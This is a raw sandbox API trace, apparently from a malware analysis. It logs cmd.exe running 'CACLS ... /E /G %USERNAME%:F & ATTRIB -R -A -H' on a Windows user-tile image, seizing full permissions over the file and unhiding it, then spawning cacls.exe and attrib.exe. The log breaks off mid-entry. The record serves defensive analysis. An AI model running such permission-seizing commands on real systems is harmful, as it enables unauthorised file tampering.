0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x0, lpData=0x20ea30*=0x1, lpcbData=0x20ea28*=0x1000) returned 0x2 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x4, lpData=0x20ea30*=0x0, lpcbData=0x20ea28*=0x4) returned 0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x4, lpData=0x20ea30*=0x9, lpcbData=0x20ea28*=0x4) returned 0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x4, lpData=0x20ea30*=0x9, lpcbData=0x20ea28*=0x4) returned 0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x0, lpData=0x20ea30*=0x9, lpcbData=0x20ea28*=0x1000) returned 0x2 [0189.630] RegCloseKey (hKey=0x40) returned 0x0 [0189.630] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886397 [0189.630] srand (_Seed=0x5b886397) [0189.630] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\"" [0189.630] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\"" [0189.631] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0189.631] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0189.631] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0189.631] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0189.631] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0189.631] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0189.631] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0189.631] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0189.631] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0189.631] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0189.631] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0189.631] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0189.631] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0189.631] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0189.631] GetEnvironmentStringsW () returned 0x3e2458* [0189.631] FreeEnvironmentStringsW (penv=0x3e2458) returned 1 [0189.631] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.631] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0189.631] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0189.631] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0189.631] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0189.632] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0189.632] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0189.632] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0189.632] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0189.632] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0189.632] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f7f0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0189.632] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f7f0, lpFilePart=0x20f7ec | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f7ec*="Desktop") returned 0x18 [0189.632] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0189.632] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f56c | out: lpFindFileData=0x20f56c) returned 0x3e0ae8 [0189.632] FindClose (in: hFindFile=0x3e0ae8 | out: hFindFile=0x3e0ae8) returned 1 [0189.632] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f56c | out: lpFindFileData=0x20f56c) returned 0x3e0ae8 [0189.632] FindClose (in: hFindFile=0x3e0ae8 | out: hFindFile=0x3e0ae8) returned 1 [0189.632] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f56c | out: lpFindFileData=0x20f56c) returned 0x3e0ae8 [0189.632] FindClose (in: hFindFile=0x3e0ae8 | out: hFindFile=0x3e0ae8) returned 1 [0189.632] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0189.632] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0189.633] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0189.633] GetEnvironmentStringsW () returned 0x3e0308* [0189.634] FreeEnvironmentStringsW (penv=0x3e0308) returned 1 [0189.634] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0189.634] GetConsoleOutputCP () returned 0x1b5 [0189.634] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.634] GetUserDefaultLCID () returned 0x409 [0189.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0189.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f930, cchData=128 | out: lpLCData="0") returned 2 [0189.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f930, cchData=128 | out: lpLCData="0") returned 2 [0189.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f930, cchData=128 | out: lpLCData="1") returned 2 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0189.635] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0189.635] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0189.636] GetConsoleTitleW (in: lpConsoleTitle=0x3d09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.636] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0189.636] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0189.636] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0189.636] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0189.637] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0189.637] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0189.637] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0189.637] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0189.637] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0189.637] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0189.637] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0189.637] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0189.640] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0189.640] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0189.640] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0189.640] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0189.640] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0189.640] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0189.640] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0189.643] GetConsoleTitleW (in: lpConsoleTitle=0x20f5c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.643] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0189.643] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0189.643] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0189.643] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0189.643] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0189.643] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0189.643] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0189.643] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0189.643] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0189.643] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0189.643] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0189.643] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0189.643] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0189.643] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0189.643] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0189.643] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0189.643] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0189.643] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0189.643] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0189.643] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0189.643] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0189.643] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0189.643] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0189.643] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0189.643] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0189.643] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0189.644] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0189.644] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0189.644] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0189.644] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0189.644] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0189.644] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0189.644] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0189.644] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0189.644] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0189.644] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0189.644] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0189.644] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0189.644] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0189.644] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0189.644] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0189.644] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0189.644] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0189.644] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0189.644] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0189.644] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0189.644] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0189.644] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0189.644] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0189.644] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0189.644] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0189.644] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0189.644] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0189.644] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0189.644] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0189.644] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0189.644] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0189.644] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0189.644] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0189.644] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0189.644] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0189.644] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0189.644] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0189.644] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0189.644] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0189.644] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0189.644] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0189.644] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0189.644] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0189.644] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0189.644] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0189.644] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0189.645] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0189.645] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0189.645] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0189.645] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0189.645] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0189.645] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0189.645] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0189.645] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0189.645] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0189.645] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0189.645] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0189.645] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0189.645] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0189.645] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0189.645] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0189.645] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0189.646] SetErrorMode (uMode=0x0) returned 0x0 [0189.646] SetErrorMode (uMode=0x1) returned 0x0 [0189.646] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3e1e98, lpFilePart=0x20f0e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f0e4*="Desktop") returned 0x18 [0189.646] SetErrorMode (uMode=0x0) returned 0x1 [0189.646] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0189.646] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0189.661] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0189.661] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x20ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0xffffffff [0189.662] GetLastError () returned 0x2 [0189.662] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x20ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0xffffffff [0189.662] GetLastError () returned 0x2 [0189.662] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x20ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0x3e2180 [0189.662] FindClose (in: hFindFile=0x3e2180 | out: hFindFile=0x3e2180) returned 1 [0189.662] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x20ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0xffffffff [0189.662] GetLastError () returned 0x2 [0189.662] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x20ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0x3e2180 [0189.662] FindClose (in: hFindFile=0x3e2180 | out: hFindFile=0x3e2180) returned 1 [0189.663] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0189.663] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0189.663] GetConsoleTitleW (in: lpConsoleTitle=0x20f358, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.663] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f1e0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f2a8 | out: lpAttributeList=0x20f1e0, lpSize=0x20f2a8) returned 1 [0189.663] UpdateProcThreadAttribute (in: lpAttributeList=0x20f1e0, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f2a0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f1e0, lpPreviousValue=0x0) returned 1 [0189.663] GetStartupInfoW (in: lpStartupInfo=0x20f19c | out: lpStartupInfo=0x20f19c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0189.663] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0189.664] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f23c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f288 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x20f288*(hProcess=0x50, hThread=0x4c, dwProcessId=0x9e0, dwThreadId=0xfcc)) returned 1 [0189.666] CloseHandle (hObject=0x4c) returned 1 [0189.666] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0189.666] GetEnvironmentStringsW () returned 0x3e0308* [0189.666] FreeEnvironmentStringsW (penv=0x3e0308) returned 1 [0189.666] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0189.697] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x20f17c | out: lpExitCode=0x20f17c*=0x0) returned 1 [0189.697] CloseHandle (hObject=0x50) returned 1 [0189.697] _vsnwprintf (in: _Buffer=0x20f2c4, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f188 | out: _Buffer="00000000") returned 8 [0189.697] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0189.697] GetEnvironmentStringsW () returned 0x3e2410* [0189.697] FreeEnvironmentStringsW (penv=0x3e2410) returned 1 [0189.697] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0189.697] GetEnvironmentStringsW () returned 0x3e2410* [0189.697] FreeEnvironmentStringsW (penv=0x3e2410) returned 1 [0189.697] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f1e0 | out: lpAttributeList=0x20f1e0) [0189.697] GetConsoleTitleW (in: lpConsoleTitle=0x20f5c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.698] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0189.698] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0189.698] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0189.698] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x20ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0xffffffff [0189.698] GetLastError () returned 0x2 [0189.698] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x20ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0xffffffff [0189.698] GetLastError () returned 0x2 [0189.698] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x20ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0x3de4d8 [0189.698] FindClose (in: hFindFile=0x3de4d8 | out: hFindFile=0x3de4d8) returned 1 [0189.698] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x20ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0xffffffff [0189.699] GetLastError () returned 0x2 [0189.699] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x20ee60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee60) returned 0x3de4d8 [0189.699] FindClose (in: hFindFile=0x3de4d8 | out: hFindFile=0x3de4d8) returned 1 [0189.699] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0189.699] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0189.699] GetConsoleTitleW (in: lpConsoleTitle=0x20f358, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0189.699] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f1e0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f2a8 | out: lpAttributeList=0x20f1e0, lpSize=0x20f2a8) returned 1 [0189.699] UpdateProcThreadAttribute (in: lpAttributeList=0x20f1e0, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f2a0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f1e0, lpPreviousValue=0x0) returned 1 [0189.699] GetStartupInfoW (in: lpStartupInfo=0x20f19c | out: lpStartupInfo=0x20f19c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0189.699] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0189.699] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f23c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f288 | out: 